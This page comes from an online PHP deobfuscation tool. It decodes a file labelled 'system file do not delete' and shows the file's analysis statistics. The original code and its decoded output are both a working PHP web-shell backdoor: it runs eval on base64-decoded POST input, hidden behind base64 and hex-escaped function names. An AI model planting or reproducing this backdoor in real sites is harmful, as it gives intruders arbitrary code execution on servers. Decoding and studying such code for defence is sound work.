Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php //cb6f82f3e4007bdaccf419abafab94c8 $_= //system file do not delete 'CmlmKGlzc2..

Decoded Output download


if(isset($_POST["code"]))
{
    eval(base64_decode($_POST["code"]));
}

Did this file decode correctly?

Original Code

<?php //cb6f82f3e4007bdaccf419abafab94c8 
 $_= 
//system file do not delete
'CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29kZSJdKSk7Cn0='; 
 //system file do not delete
$__ = "JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7";$___ = "\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65";eval($___($__));

Function Calls

base64_decode 2

Variables

$_ CmlmKGlzc2V0KCRfUE9TVFsiY29kZSJdKSkKewogICAgZXZhbChiYXNlNjRf..
$__ JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCRfKTsKZXZhbCgkY29kZSk7
$___ base64_decode
$code if(isset($_POST["code"])) { eval(base64_decode($_POST["..

Stats

MD5 a2125ef552a3abb429964edc2ce8d499
Eval Count 2
Decode Time 154 ms